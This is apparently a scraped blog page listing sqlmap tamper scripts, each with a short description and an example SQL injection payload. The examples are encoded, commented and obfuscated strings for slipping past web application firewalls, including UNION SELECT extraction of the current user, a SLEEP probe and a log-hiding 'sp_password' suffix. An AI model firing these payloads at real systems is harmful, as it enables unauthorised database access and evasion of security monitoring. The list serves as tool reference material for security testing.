SQLMap Tamper Scripts Update

apostrophemask.py

Replaces apostrophe character with its UTF-8 full width counterpart

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character with its illegal double unicode counterpart

'1 AND %271%27=%271'

appendnullbyte.py

Appends encoded NULL byte character at the end of payload

'1 AND 1=1'

base64encode.py

Base64 all characters in a given payload

'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'

'1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator

'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py

Double url-encodes all characters in a given payload (not processing already encoded)

'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

commalesslimit.py

Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'

''LIMIT 3 OFFSET 2''

commalessmid.py

Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

'MID(VERSION() FROM 1 FOR 1)'

concat2concatws.py

Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

charencode.py

Url-encodes all characters in a given payload (not processing already encoded)

'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)

'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

equaltolike.py

Replaces all occurances of operator equal ('=') with operator 'LIKE'

'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py

Slash escape quotes (' and ")

'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds versioned MySQL comment before each keyword

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

'IF(ISNULL(1),2,1)'

modsecurityversioned.py

Embraces complete query with versioned comment

'1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with zero-versioned comment

'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces around SQL keywords

'1 UNION SELECT foobar'

nonrecursivereplacement.py

Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters

'1 UNIOUNIONN SELESELECTCT 2--'

percentage.py

Adds a percentage sign ('%') infront of each character

'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M%T%A%B%L%E'

overlongutf8.py

Converts all characters in a given payload (not processing already encoded)

'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'

randomcase.py

Replaces each keyword character with random case value

'INseRt'

randomcomments.py

Add random comments to SQL keywords

'I/**/N/**/SERT'

securesphere.py

Appends special crafted string

"1 AND 1=1 and '0having'='0having'"

sp_password.py

Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

space2hash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

space2morehash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

space2mssqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Eid%0DFROM%07users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%A0id%0BFROM%0Cusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Did%0DFROM%0Ausers'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

"1 %26%26 '1'='1"

unionalltounion.py

Replaces UNION ALL SELECT with UNION SELECT

'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)

'1%bf%27 AND 1=1-- '

uppercase.py

Replaces each keyword character with upper case value

'INSERT'

varnish.py

Append a HTTP header 'X-originating-IP'

http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

versionedmorekeywords.py

Encloses each keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For'

' headers["X-Forwarded-For"]'

via

SQLMap Tamper Scripts Update 04/July/2016的更多相关文章

  1. Sqlmap Tamper大全(1)

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  2. 安全工具推荐之sqlmap tamper&sqlmap api

    我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...

  3. sqlmap tamper脚本

    本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...

  4. sqlmap Tamper脚本编写

    sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...

  5. Sqlmap Tamper大全

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  6. sqlmap tamper的使用

    前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...

  7. sqlmap tamper下模块的使用

    使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...

  8. sqlmap tamper编写

    #!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...

  9. sqlmap tamper绕过安全狗

    可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (ht ...

随机推荐

  1. C#工业物联网和集成系统解决方案的技术路线(数据源、数据采集、数据上传与接收、ActiveMQ、Mongodb、WebApi、手机App)

    目       录 工业物联网和集成系统解决方案的技术路线... 1 前言... 1 第一章           系统架构... 3 1.1           硬件构架图... 3 1.2      ...

  2. 网页mp3语音展示,点击图片放大,点击图片跳转链接,调表格

    查看mp3语音 <td class="value"><embed src="${sounds.soundName}" type="a ...

  3. Atitit java集成内嵌浏览器与外嵌浏览器attilax总结

    Atitit java集成内嵌浏览器与外嵌浏览器attilax总结 HTML5将颠覆原生App世界.这听起来有点危言耸听,但若认真分析HTML5的发展史,你会发现,这个世界的发展趋势确实就是这样. 熟 ...

  4. htm常用标签总结

    1.结构性定义 文件类型 <HTML></HTML> (放在档案的开头与结尾) 文件主题 <TITLE></TITLE> (必须放在「文头」区块内) 文 ...

  5. 4款最具影响力的自助式BI工具

    数据为王的时代,人人都需要掌握一些数据分析技能.不懂SQL,不懂数据库,Excel不精通,VBA不敢碰,这些都是横亘在面前的一道坎. 然而,企业数据分析日益上涨,数据人才供不应求,为了降低入门门槛,近 ...

  6. VS2012 Unit Test 个人学习汇总(含目录)

    首先,给出MSDN相关地址:http://msdn.microsoft.com/en-us/library/Microsoft.VisualStudio.TestTools.UnitTesting.a ...

  7. JavaEE开发基础

    1 JavaEE简介 Java平台有三个版本,分别是JavaSE(Java Platform, Standard Edition),JavaEE(Java Platform, Enterprise E ...

  8. 在阿里云中编译Linux4.5.0内核 - Ubuntu内核编译教程

    实验环境:Ubnuntu 64位(推荐使用14.04)+Xshell 阿里云现在提供的云服务器很好用的,用来编译内核性能也不错.本文介绍最基本的内核编译方法,为了方便,所有操作均在root用户下进行. ...

  9. 【只需3步】Linux php的安装与配置[源码安装]

    作者小波/QQ463431476欢迎转载! Linux:redhat 6/centos 6 继续上一篇笔记Apache的配置http://www.cnblogs.com/xiaobo-Linux/p/ ...

  10. sql一个表中的数据插入到另外一个表中

    声名:a,b ,都是表 复制代码代码如下: --b表存在(两表结构一样)  insert into b select * from a  若两表只是有部分(字段)相同,则 复制代码代码如下: inse ...